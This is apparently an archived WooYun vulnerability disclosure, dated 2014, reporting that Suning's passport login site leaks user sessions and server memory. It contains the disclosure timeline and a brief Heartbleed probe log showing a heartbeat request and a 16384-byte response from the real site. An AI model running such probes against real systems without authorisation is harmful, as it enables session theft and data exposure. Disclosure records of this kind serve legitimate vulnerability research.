WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
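2014-04-08: Details reported to the vendor; awaiting vendor handling
2014-04-09: Vendor has confirmed; details disclosed to the vendor only
2014-04-19: Details disclosed to core white hats and experts in related fields
2014-04-29: Details disclosed to regular white hats
2014-05-09: Details disclosed to intern white hats
2014-05-23: Details disclosed to the public
Improper operations and maintenance on the Suning (suning.com) main site allows logging in as random users and obtaining sensitive server information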
https://passport.suning.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 3559
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
Upgrade
Severity: Low
Vulnerability Rank: 3
Confirmed at: 2014-04-09 09:17
Confirmed
None yet